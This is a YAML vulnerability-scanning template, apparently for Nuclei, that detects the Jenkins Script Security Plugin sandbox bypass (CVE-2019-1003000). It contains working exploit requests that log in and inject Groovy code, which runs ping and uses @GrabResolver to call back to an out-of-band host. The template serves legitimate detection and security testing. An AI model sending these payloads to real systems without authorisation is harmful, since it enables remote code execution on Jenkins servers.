99 lines
3.7 KiB
YAML
99 lines
3.7 KiB
YAML
id: CVE-2019-1003000
|
|
|
|
info:
|
|
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
|
|
author: sttlr
|
|
severity: high
|
|
description: |
|
|
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2019-1003000
|
|
cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
|
|
reference:
|
|
- https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
|
|
- http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
|
|
- https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
|
|
- https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
|
|
- https://github.com/purple-WL/Jenkins_CVE-2019-1003000
|
|
- https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
|
|
metadata:
|
|
verified: true
|
|
max-request: 6
|
|
vendor: jenkins
|
|
product: script_security
|
|
tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
|
|
|
|
variables:
|
|
username: admin
|
|
vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
|
|
app_name: "{{rand_text_alpha(8)}}"
|
|
|
|
flow: http(1) && http(2) && (http(3) || http(4))
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "jenkins"
|
|
internal: true
|
|
case-insensitive: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /j_acegi_security_check HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(tolower(body_2), "jenkins", "/logout")'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- raw:
|
|
- |
|
|
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
|
|
# digest: 4b0a0048304602210085a1faf7a3de1a102f1ab5fde71db42124776cb68e66f315bdaa1a141107750b0221008549adaf38ad9247d2a2c9a8ea35e4672abe0f3ebe12c70656f9d4b465180de8:922c64590222798bb761d5b6d8e72950 |